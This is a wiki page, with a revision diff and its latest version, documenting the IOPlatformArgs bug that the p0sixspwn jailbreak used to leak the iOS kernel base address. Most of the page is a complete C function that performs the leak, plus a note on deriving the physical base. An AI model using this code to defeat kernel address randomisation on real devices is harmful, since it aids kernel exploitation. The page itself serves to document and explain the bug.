|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "IOPlatfromArgs leak"
| Line 8: | Line 8: | ||
CFStringRef parameter = CFSTR("IOPlatformArgs"); |
CFStringRef parameter = CFSTR("IOPlatformArgs"); |
||
CFDataRef data; |
CFDataRef data; |
||
| − | |||
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice")); |
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice")); |
||
if (platformExpert) |
if (platformExpert) |
||
| Line 16: | Line 15: | ||
kCFAllocatorDefault, 0); |
kCFAllocatorDefault, 0); |
||
} |
} |
||
| − | |||
IOObjectRelease(platformExpert); |
IOObjectRelease(platformExpert); |
||
CFIndex bufferLength = CFDataGetLength(data); |
CFIndex bufferLength = CFDataGetLength(data); |
||
UInt8 *buffer = malloc(bufferLength); |
UInt8 *buffer = malloc(bufferLength); |
||
CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer); |
CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer); |
||
| − | |||
typedef struct { |
typedef struct { |
||
uint32_t deviceTreeP; |
uint32_t deviceTreeP; |
||
| Line 30: | Line 27: | ||
platformArgs IOPlatformArgs; |
platformArgs IOPlatformArgs; |
||
bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs)); |
bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs)); |
||
| − | |||
return IOPlatformArgs.bootArgs; |
return IOPlatformArgs.bootArgs; |
||
} |
} |
||
Latest revision as of 13:39, 4 July 2014
Vulnerability used in p0sixspwn
This vulnerability leaks the kernel base address.
This is the code
static uint32_t
get_kernel_base_boot_args(void)
{
CFStringRef parameter = CFSTR("IOPlatformArgs");
CFDataRef data;
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert)
{
data = IORegistryEntryCreateCFProperty(platformExpert,
parameter,
kCFAllocatorDefault, 0);
}
IOObjectRelease(platformExpert);
CFIndex bufferLength = CFDataGetLength(data);
UInt8 *buffer = malloc(bufferLength);
CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
typedef struct {
uint32_t deviceTreeP;
uint32_t bootArgs;
uint32_t zero;
uint32_t zero_1;
} platformArgs;
platformArgs IOPlatformArgs;
bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
return IOPlatformArgs.bootArgs;
}
Once the attacker knows the virtual base, he can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug
